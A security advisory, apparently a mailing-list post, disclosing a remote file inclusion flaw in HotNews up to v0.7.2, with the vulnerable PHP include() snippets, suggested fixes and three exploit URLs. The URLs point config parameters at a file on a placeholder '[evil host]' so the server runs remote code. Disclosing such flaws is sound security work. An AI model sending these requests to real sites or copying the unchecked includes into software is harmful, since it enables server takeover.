HotNews arbitary file inclusion. ===+++===+++===+++ Product: HotNews Version: <= v0.7.2 Vendor: http://sourceforge.net/projects/hotnews/ Bug discovered by: Officerrr <officerrr@poligon.com.pl> Vendor Response: Not contacted yet. ===+++===+++===+++ Problem #1: ===+++===+++===+++ Attacker can include any file from remote or local server. PHP Code/Location #1: ===+++===+++===+++ -- from hotnews-engine.inc.php3 [...] /* // Init $pagetitle = $config["pagename"]; if (!empty($config["header"])) { include($config["header"]); } [...] PHP Code/Location #2: ===+++===+++===+++ -- from hnmain.inc.php3 [...] // Init include($config["incdir"] . "hndefs.inc.php3"); include($config["incdir"] . "func.inc.php3"); include($config["incdir"] . "getopts.inc.php3"); include($config["incdir"] . "db.".$config["db_type"].".inc.php3"); if (!$config["no_fasttpl"]) { include($config["incdir"] . "class.FastTemplate.php3"); } include($config["incdir"] . "class.CachedFastTemplate.php3"); [...] Exploit: ===+++===+++===+++ http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file] http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3 http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3 etc... Fix #1: ===+++===+++===+++ Turn off global_variables. Fix #2: ===+++===+++===+++ Use .htaccess to protect files in the 'includes' directory. -- Pozdrawiam, Dariusz 'Officerrr' Kolasinski <Linux Administrator> <gg: 516354> "Living on a razors edge, Balancing on a ledge"
